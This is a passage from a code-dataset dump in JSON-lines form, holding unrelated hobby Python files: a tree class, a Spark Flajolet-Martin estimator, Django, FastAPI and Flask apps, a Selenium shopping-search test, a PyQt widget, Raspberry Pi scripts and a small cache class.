Here's an example:\n\"\"\"\nimport sys\nsys.setrecursionlimit(1000)\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n\nclass Tree:\n def __init__(self):\n self.root = None\n\n def print_bfs(self):\n if not self.root:\n return\n\n queue = [self.root]\n\n while len(queue) > 0:\n current_node = queue.pop(0)\n print(current_node.data)\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n\n def in_order_traversal(self):\n nodes = []\n\n def dfs(node):\n if node:\n\n dfs(node.left)\n nodes.append(node.data)\n dfs(node.right)\n\n dfs(self.root)\n return nodes\n\n def add(self, node):\n if not self.root:\n self.root = node\n return\n\n def insert(root, node):\n\n if root.data > node.data:\n if root.left is None:\n root.left = node\n else:\n insert(root.left, node)\n else:\n\n if root.right is None:\n root.right = node\n else:\n insert(root.right, node)\n\n insert(self.root, node)\n","repo_name":"makhmudislamov/cti_ips_2020","sub_path":"mod12_trees/insert_node.py","file_name":"insert_node.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20367162844","text":"import random\nimport binascii\nfrom statistics import mean,median\nfrom datetime import datetime\nimport findspark\nfindspark.init()\nfindspark.find()\nimport pyspark\nimport random\nimport json\nimport sys\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.streaming import StreamingContext\n\ndef Prime_check(num):\n if num<=1:\n return False\n if num<=3:\n return True\n if num%2==0 or num%3==0:\n return False\n k = 5\n while k*k <= num:\n if (num%k == 0 or num%(k+2)==0):\n return False\n k=k + 6\n return True\n\n\n\ndef hasNumbers(inputString):\n for char in inputString:\n if char.isdigit() or inputString=='':\n return True\n if inputString=='':\n return True\n else:\n return False\n \n\n\ndef hashed_values2(hashfunction,conv_value,m):\n calc=((((hashfunction[0]*conv_value)+hashfunction[1])%hashfunction[2])%m)\n return calc\n\n\nhash_count=9\nrandom.seed(9001)\na = random.choices([x for x in range(1000, 30000) if Prime_check(x)], k=hash_count+1)\nb = random.choices([x for x in range(1000, 30000) if Prime_check(x)], k=hash_count+1) \ngenerated_prime = random.choices([x for x in range(1000000000, 1000000100) if Prime_check(x)],k=hash_count+1)\nhashed_list=[]\nfor points in zip(a,b,generated_prime):\n hashed_list.append([points[0],points[1],points[2]])\n \n\n\ndef Flajolet_Martin(stream):\n sizeGroup=3\n numHashes=9\n city_list=stream.collect()\n #print(len(city_list))\n m=2**(numHashes)\n true_value=len(set(city_list))\n #print(true_value)\n global hashed_list\n global outputFile\n \n L=[]\n for hashes in hashed_list:\n max_value=-1\n for cities in city_list:\n v=hasNumbers(cities)\n if v:\n pass\n else:\n hashing=int(binascii.hexlify(cities.encode('utf8')), 16)\n #print(hashing)\n hashed_value=hashed_values2(hashes,hashing,m)\n #print(hashed_value)\n #print(hashed_value)\n hashed_value=bin(hashed_value)[2:]\n length=len(hashed_value)-len(hashed_value.rstrip('0'))\n if (length > max_value):\n max_value = length\n #tail_zero.append(length)\n #max_value=max(tail_zero)\n L.append(2**max_value) \n Index_start=0\n groupAvgs=[] \n for end_Index in range(sizeGroup, numHashes, sizeGroup):\n groupAvgs.append(mean(L[Index_start:end_Index]))\n Index_start=end_Index\n estimated_value=median(groupAvgs)\n current_timestamp = 
datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n out = str(current_timestamp) + \",\" + str(true_value) + \",\" + str(estimated_value) + \"\\n\"\n outputFile.write(out)\n outputFile.flush()\n return\n\n\n\nif __name__ == \"__main__\":\n print('Mohan')\n port=int(sys.argv[1])\n output_file_path=sys.argv[2]\n\n batch_size=5 \n \n\n sc = SparkContext('local[*]','test')\n sc.setLogLevel(\"OFF\")\n ssc = StreamingContext(sc, batch_size)\n dataRDD = ssc.socketTextStream(\"localhost\", port)\n\n\n outputFile = open(output_file_path, \"w\", encoding=\"utf-8\")\n out=\"Time,Ground Truth,Estimation\"+\"\\n\"\n outputFile.write(out)\n\n \n business_rdd=dataRDD.map(lambda x:json.loads(x))\n city_rdd=business_rdd.map(lambda x:x['city'])\n city_list=city_rdd.window(30, 10).foreachRDD(Flajolet_Martin)\n \n \n ssc.start()\n ssc.awaitTermination()\n\n\n\n","repo_name":"thotamohan/Spark-streaming","sub_path":"FlajoletMartin.py","file_name":"FlajoletMartin.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34279681447","text":"import datetime\nimport utils\nimport threading\nimport uuid\n\nclass Config:\n DEFAULT_CONFIG_SELF = {}\n\n DEFAULT_CONFIG = {\n 'settings': lambda: {},\n 'timestamp': lambda: datetime.datetime.now()\n }\n\n def __init__(self, config=None):\n self.run_default_config() # Always run this first\n self.logger = utils.setup_logger(self, 'DEBUG') # Always run this second\n\n if config:\n self.run_config(config) # Run the config if it exists\n\n def run_default_config(self):\n for key, default_value_func in self.DEFAULT_CONFIG_SELF.items():\n setattr(self, key, default_value_func(self))\n for key, default_value_func in self.DEFAULT_CONFIG.items():\n setattr(self, key, default_value_func())\n\n def run_config(self, config):\n for key, value in config.items():\n if hasattr(self, key) and not key.startswith('_'): # Skip these attributes\n setattr(self, key, value)\n self.logger.info(f\"Updated config for {self.__class__.__name__} with {config}\")\n\n # ... 
rest of your code ...\n\n def update(self, updates):\n if not isinstance(updates, dict):\n raise TypeError('updates should be a dictionary')\n self.settings.update(updates)\n self.timestamp = datetime.datetime.now()\n\n\n def __getitem__(self, key):\n try:\n return self.settings[key]\n except KeyError:\n raise KeyError(f'The key \"{key}\" does not exist in the configuration settings.')\n\n def get(self, key, default=None):\n return self.settings.get(key, default)\n\n def __contains__(self, key):\n return key in self.settings\n\n def __repr__(self):\n safe_settings = {k: '***' if k.lower().endswith('password') else v for k, v in self.settings.items()}\n return f'Config({safe_settings})'\n\n def __str__(self):\n safe_settings = {k: '***' if k.lower().endswith('password') else v for k, v in self.settings.items()}\n return f'Config({safe_settings})'\n\n\nclass DefaultBotConfig:\n REQUIRED_KEYS = ['id', 'inventory', 'logger', 'lock', 'port', 'state', 'memory', 'brain']\n DEFAULT_CONFIG = {\n 'id': lambda: str(uuid.uuid4()),\n 'inventory': lambda: {'items': []},\n 'lock': lambda: threading.Lock(),\n '_created_at': lambda: datetime.datetime.now(),\n '_updated_at': lambda: datetime.datetime.now(),\n '_parent': lambda: None,\n '_logger_level': 'DEBUG',\n '_restricted_config_keys': lambda: {'id', 'port', 'state', 'memory', 'logger', 'lock'},\n 'is_thinking': False,\n 'is_updating': False,\n 'is_active': True,\n 'has_controller': False,\n }\n\n def __init__(self, custom_config=None):\n self.config = self.DEFAULT_CONFIG.copy()\n if custom_config:\n self.config.update(custom_config)\n self._verify_config()\n\n def _verify_config(self):\n for key in self.REQUIRED_KEYS:\n if key not in self.config:\n raise ValueError(f\"Missing required config key: {key}\")\n\n","repo_name":"ctavolazzi/winfobot","sub_path":"digital_highway/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"32656331189","text":"from django.urls import path\n\nfrom . 
views import RoomList,BookingListView, RoomDetailView, cancelBookingview\n\napp_name='hotelapp'\n\nurlpatterns = [\n path('room_list/', RoomList, name='RoomList'),\n path('booking_list/', BookingListView.as_view(), name='BookingListView'),\n path('room/<category>', RoomDetailView.as_view(), name='RoomDetailView'),\n path('booking/cancel/<pk>', cancelBookingview.as_view(), name='cancelBookingview'),\n \n]\n\n","repo_name":"ManvithaSukhavasi/room_booking","sub_path":"hotel/hotelapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4942014205","text":"import fastapi_users\nfrom fastapi import FastAPI\nfrom starlette.requests import Request\n\nfrom config import SECRET_KEY\nfrom core.db import database\nfrom core.fast_users import fastusers\nfrom task_app.routes import tasks_router\nfrom user_auth.jwt_config import jwt_authentication \nfrom user_auth.schemas import User\n\n\napp = FastAPI()\napp.include_router(\n fastusers.get_auth_router(jwt_authentication),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(\n fastusers.get_register_router(),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(\n fastusers.get_reset_password_router(SECRET_KEY),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(\n fastusers.get_users_router(),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(tasks_router, prefix=\"/tasks\", tags=[\"tasks\"])\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\n# @fastusers.on_after_register()\n# def on_after_register(user: User, request: Request):\n# print(f\"User {user.id} has registered.\")\n\n\n# @fastusers.on_after_forgot_password()\n# def on_after_forgot_password(user: User, token: str, request: Request):\n# print(f\"User {user.id} has forgot their password. 
Reset token: {token}\")\n\n\n","repo_name":"StepanovSerjant/TestAppvelox","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70171785610","text":"from PIL import ImageGrab, ImageDraw\nimport scree_lib.eink as eink\n\nim = ImageGrab.grab(bbox=(0,0,800,480))\n\nepd = eink.EPD()\n\nepd.init()\nepd.Clear()\nepd.display(epd.getbuffer(im))\nepd.sleep()","repo_name":"firewallfail/eink-weather","sub_path":"update_screen.py","file_name":"update_screen.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40708047258","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.support.ui import Select\nfrom time import sleep\n\n\nclass TestingMercadoLibre(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n s = Service('../chromedriver')\n cls.driver = webdriver.Chrome(service=s)\n driver = cls.driver\n driver.get(\"http://www.mercadolibre.com/\")\n driver.maximize_window()\n\n def test_serch_ps4(self):\n items = {}\n driver = self.driver\n country = driver.find_element(By.ID, 'CO')\n country.click()\n search_field = driver.find_element(By.NAME, 'as_word')\n search_field.click()\n search_field.clear()\n search_field.send_keys('playstation 4')\n search_field.submit()\n\n location = driver.find_element(By.XPATH, '//*[@id=\"root-app\"]/div/div/aside/section/div[6]/ul/li[1]/a/span[1]')\n driver.execute_script(\"arguments[0].click()\", location)\n sleep(3)\n\n codition = driver.find_element(By.PARTIAL_LINK_TEXT, 'Nuevo')\n codition.click()\n sleep(3)\n\n order_menu = driver.find_element(By.CSS_SELECTOR, '#root-app > div > div > section > div.ui-search-view-options__container > div > div > div > div.ui-search-sort-filter > div > div > button > span')\n order_menu.click()\n higher_price = driver.find_element(By.CSS_SELECTOR, '#root-app > div > div > section > div.ui-search-view-options__container > div > div > div > div.ui-search-sort-filter > div > div > div > ul > a:nth-child(3)')\n higher_price.click()\n sleep(3)\n\n for i in range(5):\n article_name = driver.find_element(By.XPATH, f'//*[@id=\"root-app\"]/div/div/section/ol/li[{i + 1}]/div/div/div[2]/div[1]/a/h2').text\n article_price = driver.find_element(By.XPATH, f'//*[@id=\"root-app\"]/div/div/section/ol/li[{i + 1}]/div/div/div[2]/div[2]/div[1]/div[1]/div/div/div/span[1]/span[2]/span[2]').text\n items[article_name] = article_price\n print(items)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"JavierLGZ/selenium-platzi","sub_path":"prueba_tecnica/mercadolibre.py","file_name":"mercadolibre.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36040003994","text":"from flask import Flask,render_template,request \r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity,linear_kernel \r\nfrom flask import Flask, render_template, request, jsonify\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity,linear_kernel \r\nfrom 
flask import Flask, render_template, request, jsonify\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\nmodel = tf.keras.models.load_model('my_model.h5')\r\napp = Flask(__name__)\r\ndef load_data(data):\r\n df= pd.read_csv(data, sep= ';', error_bad_lines= False, encoding= 'latin-1')\r\n df=df.head(500)\r\n return df\r\n\r\ndef search_term_if_not_found(term,df):\r\n term = term.capitalize()\r\n result_df= df[df['Book-Title'].str.contains(term)]\r\n return result_df['Book-Title'].iloc[0] \r\n\r\ndef vectorize_text_to_cosine_max(data):\r\n count_vec= CountVectorizer()\r\n cv_mat= count_vec.fit_transform(data)\r\n cosine_sim=cosine_similarity(cv_mat)\r\n return cosine_sim\r\n# \r\ndef get_recommendation(title,cosine_sim_mat,df,num_of_rec=8):\r\n course_indices=pd.Series(df.index,index=df['Book-Title']).drop_duplicates()\r\n idx=course_indices[title]\r\n sim_scores=list(enumerate(cosine_sim_mat[idx]))\r\n sim_scores= sorted(sim_scores,key=lambda x:x[1],reverse=True)\r\n selected_course_indices=[i[0] for i in sim_scores[1:]]\r\n selected_course_score=[i[0] for i in sim_scores[1:]]\r\n result_df= df.iloc[selected_course_indices] \r\n result_df['similarity score']=selected_course_score\r\n final_recommeded= result_df[['Book-Title','Book-Author','Year-Of-Publication','similarity score','Image-URL-L']]\r\n return final_recommeded.head(num_of_rec)\r\ndf=load_data('https://raw.githubusercontent.com/tttgm/fellowshipai/master/book_crossing_dataset/BX-Books.csv')\r\ncosine_sim_mat=vectorize_text_to_cosine_max(df['Book-Title'])\r\ndef get_suggestions():\r\n data = pd.read_csv(\"https://raw.githubusercontent.com/sahilpocker/Book-Recommender-System/master/Dataset/books.csv\")\r\n return list(data['title'].str.capitalize())\r\n@app.route('/')\r\ndef login():\r\n return render_template(\"login.html\")\r\ndatabase={'diane':'123','james':'aac','karthik':'asdsf'}\r\n\r\n@app.route('/form_login',methods=['POST','GET'])\r\ndef login_page():\r\n df=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/most_rated_books_summary_noerros.csv')\r\n titles = df['book_title']\r\n authors=df['book_author']\r\n years=df['year_of_publication']\r\n # scores=df['similarity score']\r\n images = df['image_url_l']\r\n df_rating=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/books_summary_noerros.csv')\r\n titles_rating = df_rating['book_title']\r\n authors_rating=df_rating['book_author']\r\n years_rating=df_rating['year_of_publication']\r\n images_rating = df_rating['image_url_l']\r\n name1=request.form['username']\r\n sytem=request.form['sytem']\r\n pwd=request.form['password']\r\n # COLLABORATIVE\r\n df= pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/Finalcollab.csv')\r\n coll_titles = df['book_title']\r\n coll_authors=df['book_author']\r\n coll_years=df['year_of_publication']\r\n coll_images= df['image_url_l']\r\n\r\n if name1 not in database:\r\n return render_template('login.html',info='Invalid User')\r\n else:\r\n if database[name1]!=pwd:\r\n return render_template('login.html',info='Invalid Password')\r\n else:\r\n if sytem ==\"content based\":\r\n return render_template('content.html',coll_images=coll_images,coll_years=coll_years,coll_titles=coll_titles,coll_authors=coll_authors,name=name1,title = titles,author=authors,year = years,image=images,titles_rating=titles_rating,authors_rating=authors_rating,years_rating=years_rating,images_rating=images_rating)\r\n elif sytem == \"collaborative based\":\r\n return 
render_template('collaborative.html',coll_images=coll_images,coll_years=coll_years,coll_titles=coll_titles,coll_authors=coll_authors,name=name1,title = titles,author=authors,year = years,image=images,titles_rating=titles_rating,authors_rating=authors_rating,years_rating=years_rating,images_rating=images_rating)\r\n\r\n@app.route('/predict', methods = ['POST']) # /result route Ratingsreviews\r\ndef predict():\r\n name = request.form['book_name']\r\n searchdf = df[df['Book-Title']== name]\r\n searchtitles = searchdf['Book-Title']\r\n searchauthors= searchdf['Book-Author']\r\n searchyears= searchdf['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n searchimages = searchdf['Image-URL-L']\r\n df_rating=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/mostrated.csv')\r\n titles_rating = df_rating['book_title']\r\n authors_rating=df_rating['book_author']\r\n # years=df['year_of_publication']\r\n scores_rating=df_rating['ratings']\r\n images_rating = df_rating['image_url_l']\r\n if name is not None:\r\n try :\r\n result= get_recommendation(name,cosine_sim_mat,df,8)\r\n titles = result['Book-Title']\r\n authors=result['Book-Author']\r\n years=result['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n images = result['Image-URL-L']\r\n suggestions= get_suggestions()\r\n except:\r\n name= search_term_if_not_found(name,df)\r\n searchdf = df[df['Book-Title']== name]\r\n searchtitles = searchdf['Book-Title']\r\n searchauthors= searchdf['Book-Author']\r\n searchyears= searchdf['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n searchimages = searchdf['Image-URL-L']\r\n result= get_recommendation(name,cosine_sim_mat,df,8)\r\n titles = result['Book-Title']\r\n authors=result['Book-Author']\r\n years=result['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n images = result['Image-URL-L']\r\n suggestions= get_suggestions()\r\n return render_template('Recommender.html',titles_rating=titles_rating,authors_rating=authors_rating, scores_rating=scores_rating,images_rating=images_rating,title = titles,author=authors,year = years,image=images,suggestions=suggestions,searchtitles=searchtitles,searchauthors=searchauthors,searchyears=searchyears,searchimages=searchimages)\r\n@app.route('/content/<title>', methods=['GET'])\r\ndef book_content_recommend(title):\r\n name = str(title)\r\n if name is not None:\r\n books_searched=df[df['Book-Title']==name]\r\n searched_title = books_searched['Book-Title']\r\n searched_author= books_searched['Book-Author']\r\n searched_years= books_searched['Year-Of-Publication']\r\n searched_images= books_searched['Image-URL-L']\r\n result= get_recommendation(name,cosine_sim_mat,df,8)\r\n titles = result['Book-Title']\r\n authors=result['Book-Author']\r\n years=result['Year-Of-Publication']\r\n images = result['Image-URL-L']\r\n return render_template('content_result.html',searched_years=searched_years,searched_images=searched_images,searched_title=searched_title,searched_author=searched_author,title = titles,author=authors,year = years,images=images)\r\n\r\n@app.route('/book/<coll_titles>', methods=['GET'])\r\ndef book_collaborative_recommend(coll_titles):\r\n name = str(coll_titles)\r\n combine_book_rating_data=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/Finalcollab.csv')\r\n books_df_s=combine_book_rating_data[combine_book_rating_data['book_title']==name]\r\n titles_searched = books_df_s['book_title']\r\n authors_searched=books_df_s['book_author']\r\n year_searched = 
books_df_s['year_of_publication']\r\n images_searched = books_df_s['image_url_l']\r\n user_id = books_df_s['user']\r\n user_id=user_id.iloc[0]\r\n user_r = user_id\r\n b_id =list(combine_book_rating_data.user.unique())\r\n book_arr = np.array(b_id) #get all book IDs\r\n user = np.array([user_r for i in range(len(b_id))])\r\n pred = model.predict([book_arr, user])\r\n pred = pred.reshape(-1) #reshape to single dimension\r\n pred_ids = (-pred).argsort()[0:10]\r\n top10 = combine_book_rating_data.iloc[pred_ids]\r\n f=['book_title','book_author','year_of_publication','image_url_l']\r\n displ=(top10[f])\r\n c_title = displ['book_title']\r\n c_authors = displ['book_author']\r\n c_small_image_url= displ['image_url_l']\r\n c_years= displ['year_of_publication']\r\n return render_template('result.html',year_searched=year_searched,c_years=c_years,images_searched=images_searched,authors_searched=authors_searched,titles_searched=titles_searched,c_title=c_title,c_authors=c_authors,c_small_image_url=c_small_image_url)\r\nif __name__ == '__main__':\r\n app.run(debug=True,use_reloader=False)\r\n","repo_name":"Diane10/Book_Recommender_App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37866306958","text":"from PyQt5.QtCore import (\n Qt,\n QSize,\n QRect,\n pyqtSignal,\n QPoint\n)\nfrom PyQt5.QtGui import (\n QPen,\n QPainter\n)\nfrom PyQt5.QtWidgets import (\n QWidget\n)\n##\n# A special widget designed as an aid for resizing a canvas. Based on a\n# similar widget used by the GIMP.\n##\nclass ResizeHelper(QWidget):\n offsetChanged = pyqtSignal(QPoint)\n offsetXChanged = pyqtSignal(int)\n offsetYChanged = pyqtSignal(int)\n offsetBoundsChanged = pyqtSignal(QRect)\n\n def __init__(self, parent = None):\n super().__init__(parent)\n \n self.mMouseAnchorPoint = QPoint()\n self.mOffset = QPoint()\n self.mOldSize = QSize()\n self.mDragging = False\n self.mOffsetBounds = QRect()\n self.mScale = 0.0\n self.mNewSize = QSize()\n self.mOrigOffset = QPoint()\n \n self.setMinimumSize(20, 20)\n self.setOldSize(QSize(1, 1))\n\n def oldSize(self):\n return self.mOldSize\n\n def newSize(self):\n return self.mNewSize\n\n def offset(self):\n return self.mOffset\n\n def offsetBounds(self):\n return self.mOffsetBounds\n\n def setOldSize(self, size):\n self.mOldSize = size\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n def setNewSize(self, size):\n self.mNewSize = size\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n def setOffset(self, offset):\n # Clamp the offset within the offset bounds\n newOffset = QPoint(min(self.mOffsetBounds.right(),\n max(self.mOffsetBounds.left(), offset.x())),\n min(self.mOffsetBounds.bottom(),\n max(self.mOffsetBounds.top(), offset.y())))\n if (self.mOffset != newOffset):\n xChanged = self.mOffset.x() != newOffset.x()\n yChanged = self.mOffset.y() != newOffset.y()\n self.mOffset = newOffset\n if (xChanged):\n self.offsetXChanged.emit(self.mOffset.x())\n if (yChanged):\n self.offsetYChanged.emit(self.mOffset.y())\n self.offsetChanged.emit(self.mOffset)\n self.update()\n\n ## Method to set only the X offset, provided for convenience. */\n def setOffsetX(self, x):\n self.setOffset(QPoint(x, self.mOffset.y()))\n\n ## Method to set only the Y offset, provided for convenience. */\n def setOffsetY(self, y):\n self.setOffset(QPoint(self.mOffset.x(), y))\n\n ## Method to set only new width, provided for convenience. 
*/\n def setNewWidth(self, width):\n self.mNewSize.setWidth(width)\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n ## Method to set only new height, provided for convenience. */\n def setNewHeight(self, height):\n self.mNewSize.setHeight(height)\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n def paintEvent(self, event):\n _size = self.size() - QSize(2, 2)\n if (_size.isEmpty()):\n return\n origX = (_size.width() - self.mNewSize.width() * self.mScale) / 2 + 0.5\n origY = (_size.height() - self.mNewSize.height() * self.mScale) / 2 + 0.5\n oldRect = QRect(self.mOffset, self.mOldSize)\n painter = QPainter(self)\n painter.translate(origX, origY)\n painter.scale(self.mScale, self.mScale)\n pen = QPen(Qt.black)\n pen.setCosmetic(True)\n painter.setPen(pen)\n painter.drawRect(QRect(QPoint(0, 0), self.mNewSize))\n pen.setColor(Qt.white)\n painter.setPen(pen)\n painter.setBrush(Qt.white)\n painter.setOpacity(0.5)\n painter.drawRect(oldRect)\n pen.setColor(Qt.black)\n pen.setStyle(Qt.DashLine)\n painter.setOpacity(1.0)\n painter.setBrush(Qt.NoBrush)\n painter.setPen(pen)\n painter.drawRect(oldRect)\n painter.end()\n\n def mousePressEvent(self, event):\n self.mMouseAnchorPoint = event.pos()\n self.mOrigOffset = self.mOffset\n self.mDragging = event.button() == Qt.LeftButton\n\n def mouseMoveEvent(self, event):\n if (not self.mDragging):\n return\n pos = event.pos()\n if (pos != self.mMouseAnchorPoint):\n self.setOffset(self.mOrigOffset + (pos - self.mMouseAnchorPoint) / self.mScale)\n self.offsetChanged.emit(self.mOffset)\n\n def resizeEvent(self, event):\n self.recalculateScale()\n\n def recalculateScale(self):\n _size = self.size() - QSize(2, 2)\n if (_size.isEmpty()):\n return\n if self.mOldSize.width() < self.mNewSize.width():\n width = self.mNewSize.width()\n else:\n width = 2 * self.mOldSize.width() - self.mNewSize.width()\n if self.mOldSize.height() < self.mNewSize.height():\n height = self.mNewSize.height()\n else:\n height = 2 * self.mOldSize.height() - self.mNewSize.height()\n\n # Pick the smallest scale\n scaleW = _size.width() / width\n scaleH = _size.height() / height\n if scaleW < scaleH:\n self.mScale = scaleW\n else:\n self.mScale = scaleH\n\n self.update()\n\n def recalculateMinMaxOffset(self):\n offsetBounds = self.mOffsetBounds\n if (self.mOldSize.width() <= self.mNewSize.width()):\n offsetBounds.setLeft(0)\n offsetBounds.setRight(self.mNewSize.width() - self.mOldSize.width())\n else:\n offsetBounds.setLeft(self.mNewSize.width() - self.mOldSize.width())\n offsetBounds.setRight(0)\n\n if (self.mOldSize.height() <= self.mNewSize.height()):\n offsetBounds.setTop(0)\n offsetBounds.setBottom(self.mNewSize.height() - self.mOldSize.height())\n else:\n offsetBounds.setTop(self.mNewSize.height() - self.mOldSize.height())\n offsetBounds.setBottom(0)\n\n if (self.mOffsetBounds != offsetBounds):\n self.mOffsetBounds = offsetBounds\n self.offsetBoundsChanged.emit(self.mOffsetBounds)\n","repo_name":"theall/Python-Tiled","sub_path":"src/tiled/resizehelper.py","file_name":"resizehelper.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"24014953484","text":"# 二分答案\r\n\r\n# 问题在于:\r\n# 并不是说:对于一个点,向它运动的人超过不向它运动的人\r\n# 而是说:对于一个点,向它运动的人超过向其他点运动的人\r\n\r\n# 计数的时候必须两个坐标一起考虑\r\n\r\nT = int(input())\r\n\r\n\r\ndef solve(Q, dirs):\r\n # print(dirs)\r\n x0, y0 = 0, 0\r\n\r\n def check(x, y):\r\n cnt = 0\r\n for x0, y0, d0 in dirs:\r\n if d0 == 'N' and y > y0:\r\n cnt += 1\r\n 
if d0 == 'S' and y < y0:\r\n cnt += 1\r\n if d0 == 'W' and x < x0:\r\n cnt += 1\r\n if d0 == 'E' and x > x0:\r\n cnt += 1\r\n return cnt\r\n\r\n prev = check(x0, y0)\r\n\r\n for x, y, dir in sorted(dirs, key=lambda x: x[0]):\r\n cnt = check(x, y0)\r\n if cnt > prev:\r\n prev = cnt\r\n x0 = x\r\n\r\n if x < Q:\r\n cnt = check(x + 1, y0)\r\n if cnt > prev:\r\n prev = cnt\r\n x0 = x + 1\r\n\r\n prev = check(x0, y0)\r\n\r\n for x, y, dir in sorted(dirs, key=lambda x: x[1]):\r\n cnt = check(x0, y)\r\n # print(x0, y0, prev, x, y, cnt)\r\n \r\n if cnt > prev:\r\n prev = cnt\r\n y0 = y\r\n\r\n if y < Q:\r\n cnt = check(x0, y + 1)\r\n if cnt > prev:\r\n prev = cnt\r\n y0 = y + 1\r\n\r\n return str(x0) + \" \" + str(y0)\r\n\r\n\r\nfor t in range(1, T+1):\r\n P, Q = map(int, input().split())\r\n dirs = []\r\n for p in range(P):\r\n x, y, d = input().split()\r\n dirs.append([int(x), int(y), d])\r\n print(\"Case #%d: %s\" % (t, solve(Q, dirs)))\r\n","repo_name":"songzy12/GoogleCodingCompetitions","sub_path":"codejam/2019/Round 1B/Manhattan Crepe Cart.py","file_name":"Manhattan Crepe Cart.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40901202524","text":"__author__ = 'Veltarn'\r\n\r\nimport RPi.GPIO as GPIO\r\nimport time\r\n\r\nGPIO.setmode(GPIO.BOARD)\r\nport_number = 7\r\nGPIO.setup(port_number, GPIO.IN)\r\n\r\ndef onRising(channel):\r\n '''\r\n Called whenever the hall sensor is triggered\r\n :param channel: Number of the channel\r\n :return:\r\n '''\r\n print(\"Event on \" + str(channel))\r\n\r\ndef onFalling(channel):\r\n '''\r\n Called whenever the hall sensors stop detecting something\r\n :param channel:\r\n :return:\r\n '''\r\n print(\"Nothing to detect\")\r\n\r\ndef main():\r\n\r\n GPIO.add_event_detect(port_number, GPIO.RISING, callback=onRising)\r\n\r\n try:\r\n while True:\r\n time.sleep(0.1)\r\n except KeyboardInterrupt:\r\n GPIO.cleanup()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"Veltarn/Climax","sub_path":"Tests/testhall.py","file_name":"testhall.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70862430728","text":"import datetime\nfrom datetime import datetime\n\nclass Storage(object):\n\n def __init__(self):\n self.__data = {} # { 'default': {\"key1\":[ exp1, value1]}, 'domain2': {\"key1\":[ exp1, value1] }\n\n def set(self, name, value, datatype, expiration=None, domain=\"default\"):\n try:\n if domain not in self.__data:\n self.__data.update({domain: {}})\n self.__data[domain][name] = [value, datatype, expiration]\n return \"0\"\n except Exception as e:\n return str(e)\n\n def get(self, name, domain):\n if domain in self.__data:\n rec = self.__data[domain]\n if name in rec:\n # exp in self.__data[name][0]\n if rec[name][2]: # exp is set\n now = datetime.now().timestamp()\n if now > float(rec[name][2]):\n try:\n del rec.remove[name] # remove from cache\n except Exception as e:\n pass\n return None, None\n return rec[name][0], rec[name][1] #tuple (value, datatype)\n return None, None\n\n def delete(self, name, domain):\n try:\n if domain not in self.__data:\n return \"Domain does not exists\"\n else:\n if name not in self.__data[domain]:\n return \"Key does not exists\"\n del self.__data[domain][name]\n return \"0\"\n except Exception as e:\n return str(e)\n\n\n def reset(self):\n self.__data = {}\n return \"0\"\n\n def stats(self, started, set_hit, 
